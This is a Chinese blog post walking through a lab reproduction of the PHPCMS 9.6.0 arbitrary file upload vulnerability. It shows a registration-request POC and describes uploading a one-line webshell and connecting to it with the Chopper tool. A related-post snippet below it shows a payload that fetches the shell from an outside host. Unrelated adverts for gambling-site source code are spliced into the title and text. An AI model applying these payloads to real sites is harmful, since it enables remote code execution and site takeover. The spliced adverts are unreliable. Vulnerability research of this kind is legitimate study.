phpcmsv9.6.0最新迪士尼任意源码文件上传漏洞

最新推荐文章于 2020-12-03 11:13:30 发布
最新推荐文章于 2020-12-03 11:13:30 发布
阅读量395 收藏
点赞数
文章标签: phpcmsv 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45677339/article/details/101212868
版权

一、漏洞描述
PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意的PHP代码【阿酋联源码论坛:aqiulian.com】迪士尼4.0源码Q212303635。
二、漏洞影响版本
PHPCMS 9.6.0
三、漏洞环境搭建
1、 官方下载phpcms v9.6.0版本,下载地址: http://download.phpcms.cn/v9/9.6/
2、 解压下载的文件,然后把文件放到phpstudy的网站根目录下,浏览器访问192.168.10.171/phpcms/install/install.php,开始安装
  
3、一直点击下一步,在”选择模块”这个环节,选择”全新安装PHPCMS V9”
  
4、然后一直下一步,在”账号设置”这一块填写数据库账号和密码以及设置管理员密码
  
5、然后一直下一步,直到出现如下界面,说面成功安装
  
6、登录后台,生成首页
  
四、漏洞复现
1、浏览器访问前台,注册一个会员
  
2、点击注册页面,抓包
  
3、在另一个系统(kali),开启web服务,然后在web根目录下创建一个txt文件,写入如下信息
  
4、构造POC
siteid=1&modelid=11&username=test2&password=test2123&email=test2@163.com&info[content]=&dosubmit=1&protocol=
5、修改抓包内容,添加POC
  
6、可以看到返回包的内容包含了上传文件的路径
  
7、浏览器访问
  
8、构造POC,上传一句话
POC内容:
siteid=1&modelid=11&username=testa&password=testa123&email=testa@163.com&info[content]=&dosubmit=1&protocol=
9、修改数据包,添加POC,需要注意: 在repeater里测试go时每一次都要修改username,password和email字段值,保证不能重复。
  
10、可以看到返回包的内容包含了上传文件的路径
  
11、菜刀连接

weixin_45677339
关注
PHPCMS V9.6.0任意文件上传漏洞
谢公子的博客
09-09 1703
目录 PHPCMS PHPCMS V9.6.0任意文件上传漏洞 PHPCMS PHPCMS是一款网站管理软件,该软件采用模块化开发,支持多种分类方式,使用它可方便实现个性化网站的设计、开发与维护。它支持众多的程序组合,可轻松实现网站平台迁移,并可广泛满足各种规模的网站需求,可靠性高,是一款具备文章、下载、图片、分类信息、影视、商城、采集、财务等众多功能的强大、易用、可扩展的优秀网站管理软件...
phpcms v9.6.0任意文件上传漏洞复现与原理分析(CVE-2018-14399)
不想当脚本小子的脚本小子
12-26 3002
一、漏洞描述 PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意PHP代码。 二、漏洞影响版本 PHPCMS 9.6.0 三、漏洞环境搭建 1.解压下载的文件,然后把文件放到phpstudy的网站根目录下,浏览器访问127.0.0.1/phpcms/install/install.php,开始安装 在创..
phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)
WY92139010的博客
09-04 1567
phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399) 一、漏洞描述 PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意PHP代码。 二、漏洞影响版本 PHPCMS 9.6.0 三...
最新PHPcms9.6.0 任意文件上传漏洞
aiquan9342的博客
04-10 147
在用户注册处抓包: 然后发送到repeater POC: siteid=1&modelid=11&username=z1aaaac121&password=aasaewee311as&email=a1ea2144@qq.com&info[content]=<img src=http://www.tzjrst.com/temp...
PHPcms V9 任意文件上传漏洞
qax
09-04 5963
之前碰到一个站点,存在目录遍历,看到upload目录下上传了好多php的大马,说明这网站肯定是有漏洞的,看了一下网站指纹,是phpcms的,正好借此网站复现一下此漏洞 一丶漏洞简介 此漏洞爆出来的时间是2017年4月份左右,时间比较长了,存在任意文件长传,漏洞利用比较简单,危害很大,可以直接前台getshell。 二丶影响版本 phpcms v9.6.0 三丶漏洞分析 漏洞利用点是注册的地方,我们来看一下网上常用的一个payload: http://127.0.0.1/index.php.
phpcms v9.6.0版本
09-09
phpcms v9.6.0版本】是一个重要的里程碑,它是phpcms内容管理系统的一个特定发行版,具有特定的安全性和功能特性。此版本被保留下来,主要是为了研究和学习目的,尤其是针对其中已知的安全问题——前台getshell...
phpcmsv9.0任意文件上传漏洞解析
01-19
POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Fire...
PHPCMS v9.6.0 GBK
10-23
 版本v9.6.0 功能变更及bug修正说明: 适配php5.5 php5.6 php7安装改成使用mysqli模块,不在使用mysql模块,默认使用mysqli模块。升级用户不受影响string2array函数改成json处理,为了保持兼容函数名称没做变动后台...
PHPCMS v9.6.0 任意文件上传漏洞分析
aixuan9365的博客
05-16 485
引用源:http://paper.seebug.org/273/ 配置了php debug的环境,并且根据这篇文章把流程走了一遍,对phpstorm的debug熟练度+1(跟pycharm一样) 用户名和email都要随便生成,因为注册名不能相同,所以修改了下脚本。 import re import requestsimport sysimport randomdef ...
很多人在找的蜜蜂C迪士尼III整站修复版源码
06-11
很多人在找的蜜蜂C迪士尼III整站修复版源码
用UPUPW和Mysql做迪士尼程序二次开发 【教程-带源代码】.doc
09-19
用UPUPW和Mysql做迪士尼程序二次开发 【教程-带源代码】【阿酋联源码论坛:aqiulian.com】从事行业多年,各种开发好的产品欢迎咨询(系统彩游戏、官方彩更多产品咨询客服)专业软件开发公司,资深技术团队,让您售后放心,详情请咨询客服企鹅212-303-635麦芽API接口:vip10.maltapi.com
迪士尼乐园
03-03
React Auth入门代码 指示 内部终端运行 npm i npm update 在根目录中添加一个“ .env”文件,并添加以下内容: DATABASE_URL=\<Your> SECRET=\<Your> 然后在终端中: npm run build 然后打开两个不同的终端并分别运行以下每个终端 nodemon server npm start 你完成了! 代码走了! 可用脚本 在项目目录中,可以运行: npm start 在开发模式下运行应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何棉绒错误。 npm test 在交互式监视模式下启动测试运行器。 有关更多信息,请参见关于的部分。 npm run build 构建生产到应用程序build文件夹。 它在
迪士尼无后门版
04-01
经过几天几夜的奋斗,终于把后门全去掉,并且修复一些BUG
PHPCMS最新任意文件上传漏洞分析
zimuxin的专栏
09-22 4255
工具:火狐插件hackbar 前几天就听朋友说PHPCMS最新版出了几个洞,有注入还有任意文件上传,注入我倒不是很惊讶,因为phpcms只要拿到了authkey注入就一大堆…… 任意文件上传倒是很惊讶,但是小伙伴并没有给我exp,今天看到了EXP,但是没有详细分析,那我就自己分析一下好啦。 首先去官网下一下最新版的程序,搭建起来。 为了方便各位小伙伴复现,这里附上最新版的下
反序列化复现CVE-2016-7124 AND phpcms v9.6.0任意文件上传漏洞 CVE-2018-14399
qq_43400414的博客
12-03 575
反序列化复现CVE-2016-7124 这里以一道CTF题目为例子 可以看见在sercet类中所存在的三个方法都是魔法函数,具体含义已在注释中写明 可以看出来我们需要传入一个变量为val,然后通过destructd函数输出得到我们flag.php,但是由于存在wakeup函数,导致我们反序列化后的$file始终为index.php,所以我们就需要绕过wakeup函数,使他不执行。 我们先看一看正常情况下,这段代码输出的序列化对象。 O:6:"sercet":1:{s:12:"s..
PHPCMS v9.6.0任意文件上传漏洞分析笔记
foolisheddy
05-05 4956
PHPCMS v9.6.0任意文件上传漏洞分析笔记 PHPCMS v9.6.0任意文件上传漏洞分析笔记 参考: 安装: 漏洞复现: 漏洞分析: index.php member/index.php 正常请求 register()函数: htmlspecialchars()函数: menberinput−&gt;get(menberinput−&gt;get(menber_input->g...
【2】phpcms v9.6.0任意文件上传漏洞
司徒荆的博客
05-21 2705
phpcms v9.6.0任意文件上传漏洞
phpcms_V9任意文件上传poc
soldier_wing的博客
06-30 1496
使用方法:先编译 javac -encoding UTF-8 Main.java 然后运行 java Main URL(http://www.xxxx.com) import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; import java.io.OutputStream
phpcmsV9.6.3漏洞修复与升级开发指南
资源摘要信息: "phpcmsV9.6.3升级补丁漏洞修复代码功能二次开发补丁phpcms网站开发教程文档手册" phpcmsPHP语言编写的网站内容管理系统(CMS),广泛应用于企业网站、门户、个人站点的建设。本资源包针对phpcms V...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值